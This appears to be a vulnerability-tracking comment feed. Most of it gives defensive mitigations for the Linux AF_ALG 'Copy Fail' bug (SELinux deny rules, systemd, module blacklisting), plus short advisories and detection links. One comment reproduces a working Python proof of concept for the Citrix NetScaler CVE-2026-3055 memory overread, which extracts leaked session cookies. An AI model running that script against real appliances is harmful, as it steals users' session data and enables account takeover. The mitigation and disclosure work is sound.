Recent comments

Original blog post

Deny alg_socket to Containers with SELinux to Mitigate CVE‑2026‑31431 | Blog•Feistel•Party

CVE-2026-31431 or “Copy Fail” is a bug in the Linux kernel’s implementation of the AF_ALG socket type that exposes the kernel’s crypto subsystem to unprivileged userspace. Because most applications don’t use this and there is a risk of container escape, it makes sense to deny access.

In the example below, I'm using the fish shell with an SELinux userspace release after 3.6, which is when support for deny rules was added.

opc@sparkling ~> # remove rule for testing
opc@sparkling ~> sudo semodule -r psub-container-alg
libsemanage.semanage_direct_remove_key: Removing last psub-container-alg module (no other psub-container-alg module exists at another priority).
opc@sparkling ~> sudo podman run -ti --rm alpine/openssl engine -t -c -vv afalg
(afalg) AFALG engine support
[AES-128-CBC, AES-192-CBC, AES-256-CBC]
    [ available ]
opc@sparkling ~> sudo semodule -i (sesearch -A -s container_ -rs -c alg_socket -p create | egrep -v unconfined | sed 's/^allow/\(deny/; s/:/ \(/; s/{/\(/; s/};/)))/' | psub -s -container-alg.cil)
opc@sparkling ~> sudo podman run -ti --rm alpine/openssl engine -t -c -vv afalg
20DD97B0FFFF0000:error:4000006D:lib(128)::reason(109):engines/e_afalg.c:882:
20DD97B0FFFF0000:error:1300006D:engine routines:dynamic_load:init failed:crypto/engine/eng_dyn.c:498:
20DD97B0FFFF0000:error:13000074:engine routines:ENGINE_by_id:no such engine:crypto/engine/eng_list.c:470:id=afalg
opc@sparkling ~ [1]> # :)
opc@sparkling ~ [1]>
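The fish one-liner above, rewritten as an added POSIX sh example (not code from the post) so the sesearch-to-CIL translation can be read one rewrite at a time and checked against a constructed sample of sesearch output. The sample rules, the module file name deny-container-alg.cil and the build_module helper are my assumptions; as in the original, the sed rewrites assume plain, unconditional allow rules.

```shell
#!/bin/sh
# sesearch prints an allow rule as
#   allow container_domain self:alg_socket { bind create ... };
# while a CIL deny of the same access is an s-expression:
#   (deny container_domain self (alg_socket (bind create ...)))
# Each sed expression below performs exactly one of those rewrites.
allow_to_deny_cil() {
    # Skip the unconfined_domain_type rule, as the post's `egrep -v unconfined` does.
    grep -v unconfined \
    | sed -e 's/^allow/(deny/' \
          -e 's/:/ (/' \
          -e 's/{/(/' \
          -e 's/};/)))/'
}

# Constructed sample of sesearch output (not captured from a real policy).
SAMPLE_ALLOW='allow container_domain self:alg_socket { bind create ioctl read write };
allow unconfined_domain_type domain:alg_socket { bind create ioctl read write };
allow container_runtime_domain self:alg_socket { create };'

# Render the constructed sample as CIL deny rules.
gen_policy() {
    printf '%s\n' "$SAMPLE_ALLOW" | allow_to_deny_cil
}

# On a real host: query the live policy with the post's sesearch flags and
# write the module file. Installing it (sudo semodule -i) is left to the operator.
build_module() {
    out=${1:-deny-container-alg.cil}
    sesearch -A -s container_ -rs -c alg_socket -p create | allow_to_deny_cil > "$out" \
        && printf 'wrote %s; install with: sudo semodule -i %s\n' "$out" "$out"
}
```

Running `gen_policy` shows the two deny rules the sample produces; `build_module` needs setools and a host with an SELinux policy loaded.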

Alternative Mitigations

Red Hat suggests an initcall_blacklist in the boot arguments.

Lennart Poettering’s advice for CVE-2016-8655 should also work for CVE‑2026‑31431 by using RestrictAddressFamilies=~AF_ALG on a per-service basis. In my testing this works for both containers and other services. R-fx Networks pairs this with SystemCallArchitectures=native.

user@serv ~> sudo systemd-run --pty --wait --collect  podman run -ti --rm alpine/openssl engine -t -c -vvv afalg
Running as unit: run-u3914.service
Press ^] three times within 1s to disconnect TTY.
(afalg) AFALG engine support
[AES-128-CBC, AES-192-CBC, AES-256-CBC]
    [ available ]
Finished with result: success
Main processes terminated with: code=exited/status=0
Service runtime: 548ms
user@serv ~> sudo systemd-run --pty --wait --collect -p 'RestrictAddressFamilies=~AF_PACKET AF_ALG' podman run -ti --rm alpine/openssl engine -t -c -vvv afalg
Running as unit: run-u3923.service
Press ^] three times within 1s to disconnect TTY.
280B94F7067F0000:error:4000006D:lib(128)::reason(109):engines/e_afalg.c:882:
280B94F7067F0000:error:1300006D:engine routines:dynamic_load:init failed:crypto/engine/eng_dyn.c:498:
280B94F7067F0000:error:13000074:engine routines:ENGINE_by_id:no such engine:crypto/engine/eng_list.c:470:id=afalg
Finished with result: exit-code
Main processes terminated with: code=exited/status=1
Service runtime: 563ms
user@serv ~ [1]> sudo systemd-run --pty --wait --collect openssl engine -t -c -vvv afalg
Running as unit: run-u3932.service
Press ^] three times within 1s to disconnect TTY.
(afalg) AFALG engine support
[AES-128-CBC, AES-192-CBC, AES-256-CBC]
    [ available ]
Finished with result: success
Main processes terminated with: code=exited/status=0
Service runtime: 8ms
user@serv ~> sudo systemd-run --pty --wait --collect -p 'RestrictAddressFamilies=~AF_PACKET AF_ALG' openssl engine -t -c -vvv afalg
Running as unit: run-u3935.service
Press ^] three times within 1s to disconnect TTY.
139718332651328:error:8006406D:lib(128):func(100):reason(109):engines/e_afalg.c:800:
139718332651328:error:260B606D:engine routines:dynamic_load:init failed:crypto/engine/eng_dyn.c:485:
139718332651328:error:2606A074:engine routines:ENGINE_by_id:no such engine:crypto/engine/eng_list.c:334:id=afalg
Finished with result: exit-code
Main processes terminated with: code=exited/status=1
Service runtime: 7ms
user@serv ~ [1]>

Questions about SELinux

Why was support for deny rules only added to the SELinux userspace in 2023?

Why is the output of sesearch so dissimilar to the input of semanage?

What is the purpose of allow unconfined_domain_type domain:alg_socket and does leaving this rule alone ruin the mitigation?

opc@sparkling ~> seinfo -a unconfined_domain_type -x | grep -E '(contain|^\w|^\s{3})\w'
Type Attributes: 1
  attribute unconfined_domain_type;
       container_runtime_t
opc@sparkling ~>

This relates to container_runtime_t. This is for privileged containers in rootless mode and for the container management engine itself. So it’s probably OK.

https://github.com/microsoft/WSL/issues/40365

Kernel module (without reboot)

If your system uses dynamic loading of kernel modules, the following can be done:

Run rmmod algif_aead to ensure that the module is not loaded.

Create and edit the file /etc/modprobe.d/disable-algif.conf and add install algif_aead /bin/false.

Kernel with algif_aead (such as RedHat)

Based on the following reference, https://csirt.egi.eu/2026/04/30/critical-vulnerability-in-linux-kernel/, this can be done:

sudo grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"; sudo reboot

which will require a reboot.

BPF filtering

There are also options there.

This article provides the known indicators of compromise (IOCs) associated with malicious software c05d5254 and related activity, and actions to take if IOCs are discovered.

https://my.f5.com/manage/s/article/K000160486

For more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/

which includes

import base64

import requests
import urllib3

urllib3.disable_warnings()

BANNER = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                            

watchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py
(*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-3055]
"""

print(BANNER)

while True:
    try:
        resp = requests.get("https://<host>/wsfed/passive?wctx", verify=False, allow_redirects=False)
        tass = resp.cookies.get('NSC_TASS', None)
        if tass is None:
            continue
        tassText = base64.b64decode(tass)
        memIdx = tassText.find(b'wctx=')
        if memIdx != -1:
            bled = tassText[memIdx+5:]
            cookiePos = bled.find(b'Cookie')
            if cookiePos != -1:
                print(bled[cookiePos:].decode('ascii', errors='ignore'))
    except Exception:
        pass

🚨Citrix NetScaler CVE-2026-3055 is being actively exploited in the wild

Attackers send crafted SAMLRequest payloads to /saml/login omitting the AssertionConsumerServiceURL field, triggering the appliance to leak memory contents via the NSC_TASS cookie.

Our honeypot data shows exploitation activity from the same payload structure as the @watchtowrcyber PoC.

Track exploitation of our Citrix honeypots 👉 https://console.defusedcyber.com/capabilities

https://x.com/defusedcyber/status/2038266417091326156?s=46

On 26 January 2026, Microsoft disclosed the actively exploited vulnerability CVE-2026-21509 in Microsoft Office. Within days, weaponized DOC files appeared in public and via phishing campaigns targeting Ukrainian and EU government entities, using lures related to Ukraine and EU COREPER meetings. Opening the documents triggers a WebDAV-based infection chain that downloads an LNK file, deploys a malicious DLL through COM hijacking and an explorer.exe restart, executes shellcode hidden in an image, and ultimately launches the COVENANT command-and-control framework, which leverages the legitimate Filen cloud infrastructure. This indicates a coordinated campaign likely to expand rapidly due to delayed patching and limited adoption of mitigations.

https://cert.gov.ua/article/6287250

This script allows detection of EPMM devices. https://github.com/D4-project/Plum-Rules-NSE/blob/main/ivanti_epmm.nse

This NSE script allows detection of EPMM servers using Nmap.

https://github.com/D4-project/Plum-Rules-NSE/blob/main/ivanti_epmm.nse

telnetd: Enable autologin in legacy mode.

Without authentication, autologin was broken. Bug reported by Kuaikuai Wu to the list in `2014-12/msg00010.html'.